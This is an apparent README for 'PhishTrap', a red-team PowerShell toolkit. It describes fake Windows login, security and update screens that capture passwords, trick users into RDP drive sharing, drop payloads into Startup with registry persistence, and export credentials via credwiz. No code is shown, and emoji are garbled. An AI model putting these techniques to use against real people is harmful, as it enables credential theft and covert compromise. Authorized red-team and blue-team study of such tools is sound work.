Weaponized Windows Phishing Toolkit β Social Engineering with Pure PowerShell
βοΈ Red Team tools for capturing credentials & planting payloads using native Windows features.
PhishTrap is a Red Team-oriented toolkit designed to simulate phishing scenarios using legitimate Windows components. Instead of using exploits or malware, it leverages trusted UI elements and built-in OS behaviors to stealthily trick users into revealing credentials or enabling access vectors.
- Fully written in PowerShell
- No need for external tools or exploits
- Stealthy and highly customizable
- Built for Red Team ops, Adversary Emulation, and Security Labs
- Displays a realistic Windows login screen
- Captures the password typed by the user
- No LSASS dump or suspicious behavior
- Perfect for post-exploitation or internal phishing
π WINDOWS_LOGIN/
- Weaponized
.rdpfile and a Windows Server setup - Locks user inside a kiosk-style session
- Tricks them into enabling Drive Sharing
- When enabled, drops payload via
\\tsclientto their local system
π RDP/
π Includes:
- Key disabling (Alt+Tab, Ctrl+Alt+Del)
- Fake security prompt in fullscreen Edge
- Auto-drop into Startup folder
- Registry-based persistence & cleanup logic
This tool simulates a real-world initial access scenario via a weaponized Windows Server and an .rdp file. It's made for Red Team operations, adversary emulation, or lab experiments.
Goal: Trick users into enabling drive sharing through RDP and silently plant a payload for post-exploitation.
| Step | Action |
|---|---|
| 1οΈβ£ | User opens an .rdp file or connects to server |
| 2οΈβ£ | A Kiosk session launches, disabling all key combos |
| 3οΈβ£ | User sees a fake security popup asking to enable drive sharing |
| 4οΈβ£ | If sharing is enabled, tool gains access to local system via \\tsclient |
| 5οΈβ£ | Payload is copied to Startup for future execution |
| 6οΈβ£ | Session exits Kiosk mode and restores real desktop |
- Video Setup: Watch the video
- Watch Demo video
- setup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogonfor run first process and first timeuse shell:startupandshell:commofor deploy malware and re check fake security page every time user connect for recheck.use sharpkeys toolsandreg filefor disable keys and remove.
- Displays a fake fullscreen security window instructing the user to press
Ctrl + Alt + Delete - User is told to enter a "Secure Access Code" (e.g.
1234) - Meanwhile, the script silently launches
credwiz.exeand uses the same code (1234) to generate a.crdbackup file - Since the password was attacker-defined, the resulting credential export can be easily decrypted later
π CREDWIZ_LOCKSCREEN/
π§ This technique tricks the user into generating a credential export encrypted with a known password β without ever asking for their real system password.
Displays a realistic, full-screen "Windows Update in Progress" UI
Blocks user interaction and disables key combos (Alt+Tab, Ctrl+Alt+Del)
Used as a diversion layer during post-exploitation or payload deployment
π WINDOWS_UPDATE/
π§ Usage Scenario
The fake update screen is used to:
-
Keep the user distracted while payloads are being deployed in the background
-
Prevent user input or investigation during sensitive operations
-
Give the illusion of a system update, increasing trust and delay
- Combine with C2 frameworks for post-execution control
- Deploy in lab simulations to train Blue Teams
- Bypass AV by avoiding typical malware behavior
- Use in Red Team assessments with stealth-first mindset
π¨ This tool is developed strictly for educational and authorized security testing purposes only.
π¬ It is intended to help cybersecurity professionals, researchers, and enthusiasts understand post-exploitation, red teaming, and detection techniques in lab or controlled environments.
β Do NOT use this tool on any system or network without explicit permission. Unauthorized use may be illegal and unethical.
π‘ The author takes no responsibility for any misuse or damage caused by this project.
Always hack responsibly. π»π